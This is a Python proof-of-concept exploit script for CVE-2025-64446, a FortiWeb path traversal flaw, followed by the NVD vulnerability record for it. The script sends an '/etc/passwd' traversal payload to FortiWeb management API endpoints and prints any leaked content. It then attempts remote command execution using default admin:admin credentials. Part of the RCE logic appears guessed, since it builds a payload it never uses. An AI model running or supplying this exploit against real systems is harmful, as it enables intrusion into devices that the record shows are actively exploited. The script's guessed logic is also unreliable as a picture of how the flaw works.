CVE-2025-64446

import requests import sys # CVE-2025-64446 PoC - FortiWeb Path Traversal leading to RCE # Target: Fortinet FortiWeb < 7.0.12, < 7.2.12, < 7.4.10, < 7.6.5, < 8.0.2 def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-64446""" # Path traversal payload to access /etc/passwd path_traversal_payload = "../../../../etc/passwd" # Common FortiWeb management endpoints endpoints = [ "/api/v2.0/cmdb/system/admin", "/api/v2.0/cmdb/log/attack-log", "/api/v2.0/cmdb/waf/profile", "/api/v2.0/cmdb/server-policy/connection", "/api/v2.0/cmdb/system/global" ] headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-64446-PoC)", "Accept": "application/json" } print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2025-64446 (Path Traversal in FortiWeb)") for endpoint in endpoints: url = f"{target_url}{endpoint}/{path_traversal_payload}" try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check for successful file access (path traversal successful) if response.status_code == 200 and "root:" in response.text: print(f"[!] VULNERABLE: {endpoint}") print(f"[+] Leaked content:\n{response.text[:500]}") return True elif response.status_code == 200: print(f"[+] Potential path traversal at {endpoint}") print(f"[+] Response length: {len(response.text)}") except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] No obvious path traversal detected (may require authentication)") return False def exploit_rce(target_url, cmd="whoami"): """Attempt to execute commands via FortiWeb management interface""" # Command injection through path traversal exploit_payload = f"../../../../..{cmd}" # FortiWeb CLI API endpoint endpoints = [ "/api/v2.0/cli", "/api/v2.0/cmdb/system/console", "/api/v2.0/exec" ] headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json", "Authorization": "Basic YWRtaW46YWRtaW4=" # admin:admin (default) } data = {"command": cmd} for endpoint in endpoints: try: url = f"{target_url}{endpoint}" response = requests.post(url, json=data, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[!] Command execution successful via {endpoint}") print(f"[+] Output: {response.text}") return True except requests.RequestException: pass print("[-] RCE attempt failed (may require authentication or different endpoint)") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64446.py <target_url>") print("Example: python cve-2025-64446.py https://fortiweb.example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

{"cve": {"id": "CVE-2025-64446", "sourceIdentifier": "[email protected]", "published": "2025-11-14T16:15:58.567", "lastModified": "2025-11-21T18:27:33.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-11-14", "cisaActionDue": "2025-11-21", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Fortinet FortiWeb Path Traversal Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.12", "matchCriteriaId": "CDE13E2A-CEC3-4FC7-98AD-11CA1EAEC0C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.12", "matchCriteriaId": "551127B2-DCE9-403D-8073-ACD717CD0B19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.10", "matchCriteriaId": "83212B0A-5EEF-4FA7-89C5-5E4D687CBB07"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "D358CE92-A30D-4058-8D12-00376E4B9074"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "F1DD8ABA-9BB5-4ED8-9E34-1CB0752651DF"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-910", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-64446", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}